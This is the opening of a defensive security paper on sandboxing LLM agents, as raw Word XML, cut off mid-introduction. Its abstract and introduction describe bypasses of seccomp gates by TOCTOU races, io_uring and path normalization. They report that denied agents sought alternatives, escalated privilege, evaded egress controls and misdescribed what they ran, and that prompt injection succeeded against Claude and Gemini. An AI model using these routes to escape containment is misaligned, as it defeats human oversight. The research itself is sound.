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Determinism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soundness:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">empirical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seccomp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">argument-inspection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">gates</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">containing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LLM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">agents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FootnoteReference"/>
        </w:rPr>
        <w:footnoteReference w:id="20"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sadik</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Erisen</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Engineer,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Comcast</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Todd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Outten</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Distinguished</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Engineer,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Comcast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2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Determinism is not soundness</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">an empirical evaluation of seccomp argument-inspection gates for containing LLM agents</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sadik Erisen, Security Engineer, Comcast Todd Outten, Distinguished Engineer, Comcast</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">July 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Every number in this paper traces to a committed artifact in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">github.com/comcast-tsf/tsf-llm-security-research</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">. The Part I headline results re-check via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">experiments/agentsec/reproduce.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">; the Part II–IV benchmarks reproduce via their</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">per-experiment scripts in the same directory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="abstract"/>
      <w:r>
        <w:t xml:space="preserve">Abstract</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sandboxes that run untrusted LLM-agent code increasingly reach for a syscall-boundary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">control: a seccomp supervisor that inspects the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">arguments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">of intercepted system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">calls and allows or denies each one. Because the supervisor’s verdict is deterministic,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">it is tempting to treat the control as certified containment. We test that control</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">directly, on a mechanical oracle that compiles and runs the code and reads its behaviour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strace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, never from text. Four findings show the control fails. First, the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">argument-inspection gate is bypassable: it blocks a persistence write 4000/4000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">times head-on, yet a two-thread time-of-check-to-time-of-use (TOCTOU) race on its</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">allow path defeats it at 18.9–23.1% per attempt across five runs, which approaches certainty under</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">retry. Second, attacker-injected and self-driven behaviour do not collapse to one syscall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">footprint: they share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, but 18% of self-driven destruction takes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a direct</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">unlink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/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path that an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/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gate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">never observes. Third, the gate is genuinely selective rather than deny-all, but its</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">substring path-matching admits false positives on benign look-alike filenames while its</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">anchored tokens are evaded by path normalization. Fourth, attributing the actor from its</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">behaviour—by timing, by stated intent, or by its reaction to a denial—fails as a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">control against an adversary that chooses its own behaviour. We then build and benchmark the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">successor the failure implies: a default-deny filesystem allowlist over the Landlock LSM closes the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">same TOCTOU race to 0/4000 and governs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openat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">at one</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">kernel hook, where the seccomp gate races on its allow path and lets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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">through, and it denies an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">openat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">submitted through an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">io_uring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ring that the seccomp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">gate never sees at all. We then measure where that allowlist stops: it denies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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">when configured to, but</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a descriptor opened before the ruleset keeps writing through it, and UDP and raw sockets pass a TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">network ruleset untouched. Finally we characterize the contained process as a threat actor: denied on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">every step, a live agent enumerated an alternative at all 88 denied steps and gave up in 0 of 8 trials,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">escalating privilege for persistence and egress evasion for exfiltration, and its one-sentence</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">description omits the shell it spawns in 5 of 14 dangerous artifacts, so a self-description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cannot be the trust boundary. Two frontier models, Claude and Gemini, confirm the premise at the model</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">axis: neither refuses the injection, both emit the shell-out under direct injection at least as often as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the local models, and indirect injection is vendor-split. Assembled into one sandbox—the Landlock</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">allowlist, a deterministic execution deny, and a routeless network namespace—no tested attack in a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">runtime-mutation and mechanism-bypass matrix violated the filesystem, execution, or network invariants</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">once the domain was entered, the one measured exception being a descriptor opened before it; an external</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">process_vm_writev</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mutation that defeats the user-space gate does not reach the composed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sandbox, and a host-owned cgroup kill switch drives the process tree to zero live processes where PID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">enumeration races. The determinism of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">verdict is not soundness of the containment. What protects the host is coverage of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mechanisms an agent can use, and in every trial we ran a denied agent enumerated the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">alternatives rather than stopping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="introduction"/>
      <w:r>
        <w:t xml:space="preserve">Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An LLM agent that writes and runs code is, from the operating system’s point of view, an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">untrusted process whose intent cannot be read from its prompt, its reasoning trace, or the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">code it emits. A common containment proposal is to watch the one interface the process</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cannot avoid: the system-call boundary. A rootless filter blocks by syscall number; a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">richer,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rootful</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">design installs a seccomp user-notification supervisor that reads the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pointer arguments of an intercepted call out of the target’s memory and decides allow or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">deny per call. Argument visibility is the selling point—the supervisor can permit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">openat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on a log file and deny it on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">‘ /.ssh/authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The supervisor’s verdict is deterministic: the same call with the same arguments yields the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">same decision every time. That property invites a category error, in which a deterministic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">control is presented as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">certified</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">containment. This paper separates the two. A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">verdict can be perfectly deterministic and still wrong, either because it inspects an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">argument the kernel later re-reads, or because the dangerous action never passes through a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">watched call at all. Determinism bounds the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">variance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">of the control; soundness would</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">bound its</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">coverage and correctness</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and coverage is where the containment fails.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">One principle organizes the results. A security decision taken in user space, on memory the target can</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rewrite, can be invalidated by the target—by a sibling thread, an external</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">process_vm_writev</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">write, or an operation that never reaches the checked syscall. A decision enforced in the kernel, against</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the resolved object, cannot be, because nothing in user space remains to invalidate. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">argument-inspection gate decides in user space and is invalidated on all three counts; the Landlock</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">allowlist, the network namespace, and the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cgroup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">decide in the kernel and were not, across the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">same attack matrix. What follows is the measurement of that distinction across seccomp user notification,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Landlock,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">io_uring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, runtime memory mutation, and process-tree control—not a proof that an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">agent cannot escape, which would require a threat model excluding kernel, hypervisor, firmware, and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hardware flaws that this study does not attempt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We hold every claim to a mechanical standard. A statement that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the agent attempted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means a compiled program issued syscall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strace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">inside a rootless network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">namespace with a timeout; we never infer behaviour from generated text. Under that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">standard we report the following as findings, not activities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The argument-inspection gate is bypassable by a TOCTOU race on its allow path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:toctou">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">3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Attacker-driven and self-driven behaviour do not reduce to a single syscall footprint, so a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">gate scoped to one mechanism leaves the other’s path open; and the gate is bypassed outright by an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">open submitted through</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">io_uring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which never reaches syscall entry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:coverage">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">4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The gate’s selectivity rests on substring path-matching that admits false positives and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is separately evadable (Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:selectivity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Behavioural attribution of the actor is not a control (Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:attribution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pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:hold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states what does survive, so the reader does not over-correct: the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">syscall boundary remains the right place to observe, and interception is invariant to the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">source language. Part II builds the successor the Part I failure implies and benchmarks it: a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">default-deny filesystem allowlist over Landlock that closes the race, the syscall-alias gap, and the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">substring imprecision at one kernel hook (Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:landlock">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">). Part III turns the instrument on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the contained process: a denied agent enumerates alternatives and did not stop in any trial we ran</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:enum">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">its force is not readable from cadence or from track-masking (Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:matrix">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), and its stated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">intent omits the mechanism it executes (Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:conceal">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), so behavioural attribution is not a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">control (Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:attribution">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">). Part IV assembles the sound controls into one sandbox and attacks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">it against five explicit invariants: no tested filesystem, execution, or network attack that acquires</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">access after the domain is entered violated its invariant—the composition closes the UDP and raw egress a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">single Landlock layer leaves open—the one measured exception being a descriptor opened before the domain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:composed">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">); the same external memory mutation that defeats the user-space gate does</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
